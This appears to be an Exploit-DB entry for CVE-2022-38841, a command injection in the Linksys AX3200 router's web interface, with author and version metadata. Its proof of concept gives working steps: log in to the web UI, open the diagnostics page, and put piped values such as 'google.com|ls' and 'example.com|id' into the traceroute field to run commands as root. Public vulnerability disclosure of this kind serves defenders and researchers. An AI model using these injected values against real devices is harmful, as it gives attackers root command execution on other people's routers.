6206f4f208
4 changes to exploits/shellcodes/ghdb SoX 14.4.2 - Denial Of Service Linksys AX3200 V1.1.00 - Command Injection VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
16 lines
No EOL
467 B
Text
16 lines
No EOL
467 B
Text
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
|
|
# Date: 2022-09-19
|
|
# Exploit Author: Ahmed Alroky
|
|
# Author: Linksys
|
|
# Version: 1.1.00
|
|
# Authentication Required: YES
|
|
# CVE : CVE-2022-38841
|
|
|
|
# Tested on: Windows
|
|
|
|
# Proof Of Concept:
|
|
|
|
1 - login into AX3200 webui
|
|
2 - go to diagnostics page
|
|
3 - put "google.com|ls" to perform a traceroute
|
|
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user |